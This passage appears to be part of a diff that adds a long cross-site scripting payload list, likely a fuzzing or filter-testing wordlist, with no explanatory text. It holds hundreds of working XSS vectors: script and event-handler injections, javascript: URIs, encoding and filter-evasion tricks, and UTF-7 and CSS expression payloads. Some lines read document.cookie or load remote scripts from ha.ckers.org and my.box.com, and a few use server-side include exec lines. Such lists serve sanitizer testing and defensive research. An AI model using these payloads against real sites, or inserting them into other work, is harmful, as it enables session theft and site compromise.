<!--<img src="--><img src=x onerror=alert(XSS)//">
|
|
834
|
+
<![><img src="]><img src=x onerror=alert(XSS)//">
|
|
835
|
+
<style><img src="</style><img src=x onerror=alert(XSS)//">
|
|
836
|
+
<? foo="><script>alert(1)</script>">
|
|
837
|
+
<! foo="><script>alert(1)</script>">
|
|
838
|
+
</ foo="><script>alert(1)</script>">
|
|
839
|
+
<? foo="><x foo='?><script>alert(1)</script>'>">
|
|
840
|
+
<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
|
|
841
|
+
<% foo><x foo="%><script>alert(123)</script>">
|
|
842
|
+
<div style="font-family:'foo ;color:red;';">LOL
|
|
843
|
+
LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
|
|
844
|
+
<script>({0:#0=alert/#0#/#0#(0)})</script>
|
|
845
|
+
<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
|
|
846
|
+
<SCRIPT>alert(/XSS/.source)</SCRIPT>
|
|
847
|
+
\\";alert('XSS');//
|
|
848
|
+
</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
|
|
849
|
+
<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
|
|
850
|
+
<BODY BACKGROUND=\"javascript:alert('XSS')\">
|
|
851
|
+
<BODY ONLOAD=alert('XSS')>
|
|
852
|
+
<IMG DYNSRC=\"javascript:alert('XSS')\">
|
|
853
|
+
<IMG LOWSRC=\"javascript:alert('XSS')\">
|
|
854
|
+
<BGSOUND SRC=\"javascript:alert('XSS');\">
|
|
855
|
+
<BR SIZE=\"&{alert('XSS')}\">
|
|
856
|
+
<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
|
|
857
|
+
<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
|
|
858
|
+
<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
|
|
859
|
+
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
|
860
|
+
<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
|
|
861
|
+
<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
|
|
862
|
+
<XSS STYLE=\"behavior: url(xss.htc);\">
|
|
863
|
+
<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
|
|
864
|
+
<IMG SRC='vbscript:msgbox(\"XSS\")'>
|
|
865
|
+
<IMG SRC=\"mocha:[code]\">
|
|
866
|
+
<IMG SRC=\"livescript:[code]\">
|
|
867
|
+
žscriptualert(EXSSE)ž/scriptu
|
|
868
|
+
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
|
|
869
|
+
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
|
|
870
|
+
<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
|
|
871
|
+
<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
|
|
872
|
+
<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
|
|
873
|
+
<TABLE BACKGROUND=\"javascript:alert('XSS')\">
|
|
874
|
+
<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
|
|
875
|
+
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
|
|
876
|
+
<DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
|
|
877
|
+
<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
|
|
878
|
+
<DIV STYLE=\"width: expression(alert('XSS'));\">
|
|
879
|
+
<STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
|
|
880
|
+
<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
|
|
881
|
+
<XSS STYLE=\"xss:expression(alert('XSS'))\">
|
|
882
|
+
exp/*<A STYLE='no\xss:noxss(\"*//*\");
|
|
883
|
+
xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
|
|
884
|
+
<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
|
|
885
|
+
<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
|
|
886
|
+
<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
|
|
887
|
+
<!--[if gte IE 4]>
|
|
888
|
+
<SCRIPT>alert('XSS');</SCRIPT>
|
|
889
|
+
<![endif]-->
|
|
890
|
+
<BASE HREF=\"javascript:alert('XSS');//\">
|
|
891
|
+
<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
|
|
892
|
+
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
|
|
893
|
+
<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
|
|
894
|
+
<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
|
|
895
|
+
a=\"get\";
|
|
896
|
+
b=\"URL(\\"\";
|
|
897
|
+
c=\"javascript:\";
|
|
898
|
+
d=\"alert('XSS');\\")\";
|
|
899
|
+
eval(a+b+c+d);
|
|
900
|
+
<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
|
|
901
|
+
<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
|
|
902
|
+
</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
|
903
|
+
<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>
|
|
904
|
+
<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
|
|
905
|
+
<XML SRC=\"xsstest.xml\" ID=I></XML>
|
|
906
|
+
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
|
907
|
+
<HTML><BODY>
|
|
908
|
+
<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
|
|
909
|
+
<?import namespace=\"t\" implementation=\"#default#time2\">
|
|
910
|
+
<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
|
|
911
|
+
</BODY></HTML>
|
|
912
|
+
<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
|
|
913
|
+
<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->
|
|
914
|
+
<? echo('<SCR)';
|
|
915
|
+
echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
|
|
916
|
+
<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
|
|
917
|
+
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
|
|
918
|
+
<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
|
|
919
|
+
<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
|
920
|
+
<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
|
|
921
|
+
<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
|
|
922
|
+
<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
|
|
923
|
+
<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
|
|
924
|
+
<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
|
|
925
|
+
<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
|
|
926
|
+
<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
|
|
927
|
+
<A HREF=\"http://66.102.7.147/\">XSS</A>
|
|
928
|
+
<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
|
|
929
|
+
<A HREF=\"http://1113982867/\">XSS</A>
|
|
930
|
+
<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
|
|
931
|
+
<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
|
|
932
|
+
<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>
|
|
933
|
+
<A HREF=\"//www.google.com/\">XSS</A>
|
|
934
|
+
<A HREF=\"//google\">XSS</A>
|
|
935
|
+
<A HREF=\"http://ha.ckers.org@google\">XSS</A>
|
|
936
|
+
<A HREF=\"http://google:ha.ckers.org\">XSS</A>
|
|
937
|
+
<A HREF=\"http://google.com/\">XSS</A>
|
|
938
|
+
<A HREF=\"http://www.google.com./\">XSS</A>
|
|
939
|
+
<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
|
|
940
|
+
<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
|
|
941
|
+
<
|
|
942
|
+
%3C
|
|
943
|
+
<
|
|
944
|
+
<
|
|
945
|
+
<
|
|
946
|
+
<
|
|
947
|
+
<
|
|
948
|
+
<
|
|
949
|
+
<
|
|
950
|
+
<
|
|
951
|
+
<
|
|
952
|
+
<
|
|
953
|
+
<
|
|
954
|
+
<
|
|
955
|
+
<
|
|
956
|
+
<
|
|
957
|
+
<
|
|
958
|
+
<
|
|
959
|
+
<
|
|
960
|
+
<
|
|
961
|
+
<
|
|
962
|
+
<
|
|
963
|
+
<
|
|
964
|
+
<
|
|
965
|
+
<
|
|
966
|
+
<
|
|
967
|
+
<
|
|
968
|
+
<
|
|
969
|
+
<
|
|
970
|
+
<
|
|
971
|
+
<
|
|
972
|
+
<
|
|
973
|
+
<
|
|
974
|
+
<
|
|
975
|
+
<
|
|
976
|
+
<
|
|
977
|
+
<
|
|
978
|
+
<
|
|
979
|
+
<
|
|
980
|
+
<
|
|
981
|
+
<
|
|
982
|
+
<
|
|
983
|
+
<
|
|
984
|
+
<
|
|
985
|
+
<
|
|
986
|
+
<
|
|
987
|
+
<
|
|
988
|
+
<
|
|
989
|
+
<
|
|
990
|
+
<
|
|
991
|
+
<
|
|
992
|
+
<
|
|
993
|
+
<
|
|
994
|
+
<
|
|
995
|
+
<
|
|
996
|
+
<
|
|
997
|
+
<
|
|
998
|
+
<
|
|
999
|
+
<
|
|
1000
|
+
<
|
|
1001
|
+
<
|
|
1002
|
+
\x3c
|
|
1003
|
+
\x3C
|
|
1004
|
+
\u003c
|
|
1005
|
+
\u003C
|
|
1006
|
+
<iframe src=http://ha.ckers.org/scriptlet.html>
|
|
1007
|
+
<IMG SRC=\"javascript:alert('XSS')\"
|
|
1008
|
+
<SCRIPT SRC=//ha.ckers.org/.js>
|
|
1009
|
+
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
|
|
1010
|
+
<<SCRIPT>alert(\"XSS\");//<</SCRIPT>
|
|
1011
|
+
<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
|
|
1012
|
+
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
|
|
1013
|
+
<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
|
|
1014
|
+
<IMG SRC=\" javascript:alert('XSS');\">
|
|
1015
|
+
perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
|
|
1016
|
+
perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
|
|
1017
|
+
<IMG SRC=\"jav
ascript:alert('XSS');\">
|
|
1018
|
+
<IMG SRC=\"jav
ascript:alert('XSS');\">
|
|
1019
|
+
<IMG SRC=\"jav	ascript:alert('XSS');\">
|
|
1020
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
1021
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
1022
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
1023
|
+
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
1024
|
+
<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
|
|
1025
|
+
<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
|
|
1026
|
+
<IMG SRC=javascript:alert("XSS")>
|
|
1027
|
+
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
1028
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
1029
|
+
<IMG SRC=\"javascript:alert('XSS');\">
|
|
1030
|
+
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
|
1031
|
+
'';!--\"<XSS>=&{()}
|
|
1032
|
+
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
1033
|
+
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
1034
|
+
'';!--"<XSS>=&{()}
|
|
1035
|
+
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
|
1036
|
+
<IMG SRC="javascript:alert('XSS');">
|
|
1037
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
1038
|
+
<IMG SRC=javascrscriptipt:alert('XSS')>
|
|
1039
|
+
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
1040
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
1041
|
+
<IMG SRC="  javascript:alert('XSS');">
|
|
1042
|
+
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1043
|
+
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1044
|
+
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
1045
|
+
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
|
|
1046
|
+
\";alert('XSS');//
|
|
1047
|
+
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
|
1048
|
+
¼script¾alert(¢XSS¢)¼/script¾
|
|
1049
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
|
1050
|
+
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
1051
|
+
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
|
1052
|
+
<TABLE BACKGROUND="javascript:alert('XSS')">
|
|
1053
|
+
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
|
|
1054
|
+
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
1055
|
+
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
|
1056
|
+
<DIV STYLE="width: expression(alert('XSS'));">
|
|
1057
|
+
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
|
1058
|
+
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
|
1059
|
+
<XSS STYLE="xss:expression(alert('XSS'))">
|
|
1060
|
+
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
|
1061
|
+
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
|
|
1062
|
+
a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
|
|
1063
|
+
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
|
|
1064
|
+
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
|
|
1065
|
+
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1066
|
+
<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
|
|
1067
|
+
<form><button formaction="javascript:alert(123)">crosssitespt
|
|
1068
|
+
<frameset onload=alert(123)>
|
|
1069
|
+
<!--<img src="--><img src=x onerror=alert(123)//">
|
|
1070
|
+
<style><img src="</style><img src=x onerror=alert(123)//">
|
|
1071
|
+
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
|
|
1072
|
+
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
|
|
1073
|
+
<embed src="javascript:alert(1)">
|
|
1074
|
+
<? foo="><script>alert(1)</script>">
|
|
1075
|
+
<! foo="><script>alert(1)</script>">
|
|
1076
|
+
</ foo="><script>alert(1)</script>">
|
|
1077
|
+
<script>({0:#0=alert/#0#/#0#(123)})</script>
|
|
1078
|
+
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
|
|
1079
|
+
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
|
|
1080
|
+
<script src="#">{alert(1)}</script>;1
|
|
1081
|
+
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
|
|
1082
|
+
<svg xmlns="#"><script>alert(1)</script></svg>
|
|
1083
|
+
<svg onload="javascript:alert(123)" xmlns="#"></svg>
|
|
1084
|
+
<iframe xmlns="#" src="javascript:alert(1)"></iframe>
|
|
1085
|
+
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
|
|
1086
|
+
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
|
|
1087
|
+
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
|
|
1088
|
+
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
|
|
1089
|
+
%253cscript%253ealert(document.cookie)%253c/script%253e
|
|
1090
|
+
“><s”%2b”cript>alert(document.cookie)</script>
|
|
1091
|
+
“><ScRiPt>alert(document.cookie)</script>
|
|
1092
|
+
“><<script>alert(document.cookie);//<</script>
|
|
1093
|
+
foo<script>alert(document.cookie)</script>
|
|
1094
|
+
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
|
|
1095
|
+
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
|
|
1096
|
+
‘; alert(document.cookie); var foo=’
|
|
1097
|
+
foo\’; alert(document.cookie);//’;
|
|
1098
|
+
</script><script >alert(document.cookie)</script>
|
|
1099
|
+
<img src=asdf onerror=alert(document.cookie)>
|
|
1100
|
+
<BODY ONLOAD=alert(’XSS’)>
|
|
1101
|
+
<script>alert(1)</script>
|
|
1102
|
+
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
|
|
1103
|
+
<video src=1 onerror=alert(1)>
|
|
1104
|
+
<audio src=1 onerror=alert(1)>
|
|
1105
|
+
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
|
|
1106
|
+
'';!--"<XSS>=&{()}
|
|
1107
|
+
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
|
|
1108
|
+
<script/src=data:,alert()>
|
|
1109
|
+
<marquee/onstart=alert()>
|
|
1110
|
+
<video/poster/onerror=alert()>
|
|
1111
|
+
<isindex/autofocus/onfocus=alert()>
|
|
1112
|
+
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
|
|
1113
|
+
<IMG SRC="javascript:alert('XSS');">
|
|
1114
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
1115
|
+
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
1116
|
+
<IMG SRC=javascript:alert("XSS")>
|
|
1117
|
+
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
|
|
1118
|
+
<a onmouseover="alert(document.cookie)">xxs link</a>
|
|
1119
|
+
<a onmouseover=alert(document.cookie)>xxs link</a>
|
|
1120
|
+
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
1121
|
+
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
1122
|
+
<IMG SRC=# onmouseover="alert('xxs')">
|
|
1123
|
+
<IMG SRC= onmouseover="alert('xxs')">
|
|
1124
|
+
<IMG onmouseover="alert('xxs')">
|
|
1125
|
+
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
|
|
1126
|
+
<IMG SRC=javascript:alert(
|
|
1127
|
+
'XSS')>
|
|
1128
|
+
<IMG SRC=javascript:a&
|
|
1129
|
+
#0000108ert('XSS')>
|
|
1130
|
+
<IMG SRC=javascript:alert('XSS')>
|
|
1131
|
+
<IMG SRC="jav ascript:alert('XSS');">
|
|
1132
|
+
<IMG SRC="jav	ascript:alert('XSS');">
|
|
1133
|
+
<IMG SRC="jav
ascript:alert('XSS');">
|
|
1134
|
+
<IMG SRC="jav
ascript:alert('XSS');">
|
|
1135
|
+
<IMG SRC="  javascript:alert('XSS');">
|
|
1136
|
+
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1137
|
+
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
|
|
1138
|
+
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1139
|
+
<<SCRIPT>alert("XSS");//<</SCRIPT>
|
|
1140
|
+
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
|
|
1141
|
+
<SCRIPT SRC=//ha.ckers.org/.j>
|
|
1142
|
+
<IMG SRC="javascript:alert('XSS')"
|
|
1143
|
+
<iframe src=http://ha.ckers.org/scriptlet.html <
|
|
1144
|
+
\";alert('XSS');//
|
|
1145
|
+
</script><script>alert('XSS');</script>
|
|
1146
|
+
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
|
|
1147
|
+
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
|
|
1148
|
+
<BODY BACKGROUND="javascript:alert('XSS')">
|
|
1149
|
+
<IMG DYNSRC="javascript:alert('XSS')">
|
|
1150
|
+
<IMG LOWSRC="javascript:alert('XSS')">
|
|
1151
|
+
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
|
|
1152
|
+
<IMG SRC='vbscript:msgbox("XSS")'>
|
|
1153
|
+
<IMG SRC="livescript:[code]">
|
|
1154
|
+
<BODY ONLOAD=alert('XSS')>
|
|
1155
|
+
<BGSOUND SRC="javascript:alert('XSS');">
|
|
1156
|
+
<BR SIZE="&{alert('XSS')}">
|
|
1157
|
+
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
|
|
1158
|
+
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
|
|
1159
|
+
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
|
|
1160
|
+
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
|
|
1161
|
+
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
|
|
1162
|
+
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
|
|
1163
|
+
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
|
|
1164
|
+
exp/*<A STYLE='no\xss:noxss("*//*");
|
|
1165
|
+
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
|
|
1166
|
+
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
|
|
1167
|
+
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
|
|
1168
|
+
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
|
|
1169
|
+
<XSS STYLE="xss:expression(alert('XSS'))">
|
|
1170
|
+
<XSS STYLE="behavior: url(xss.htc);">
|
|
1171
|
+
¼script¾alert(¢XSS¢)¼/script¾
|
|
1172
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
|
|
1173
|
+
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
|
|
1174
|
+
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
|
|
1175
|
+
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
|
|
1176
|
+
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
|
|
1177
|
+
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
|
|
1178
|
+
<TABLE BACKGROUND="javascript:alert('XSS')">
|
|
1179
|
+
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
|
|
1180
|
+
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
1181
|
+
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
|
|
1182
|
+
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
|
|
1183
|
+
<DIV STYLE="width: expression(alert('XSS'));">
|
|
1184
|
+
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
|
|
1185
|
+
<BASE HREF="javascript:alert('XSS');//">
|
|
1186
|
+
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
|
|
1187
|
+
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
|
|
1188
|
+
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
|
|
1189
|
+
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
|
|
1190
|
+
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
|
|
1191
|
+
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
|
|
1192
|
+
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1193
|
+
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1194
|
+
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1195
|
+
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1196
|
+
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1197
|
+
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1198
|
+
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
|
|
1199
|
+
<A HREF="http://66.102.7.147/">XSS</A>
|
|
1200
|
+
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
|
|
1201
|
+
veris-->group<svg/onload=alert(/XSS/)//
|
|
1202
|
+
#"><img src=M onerror=alert('XSS');>
|
|
1203
|
+
element[attribute='<img src=x onerror=alert('XSS');>
|
|
1204
|
+
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
|
|
1205
|
+
%22;alert%28%27RVRSH3LL_XSS%29//
|
|
1206
|
+
javascript:alert%281%29;
|
|
1207
|
+
<w contenteditable id=x onfocus=alert()>
|
|
1208
|
+
alert;pg("XSS")
|
|
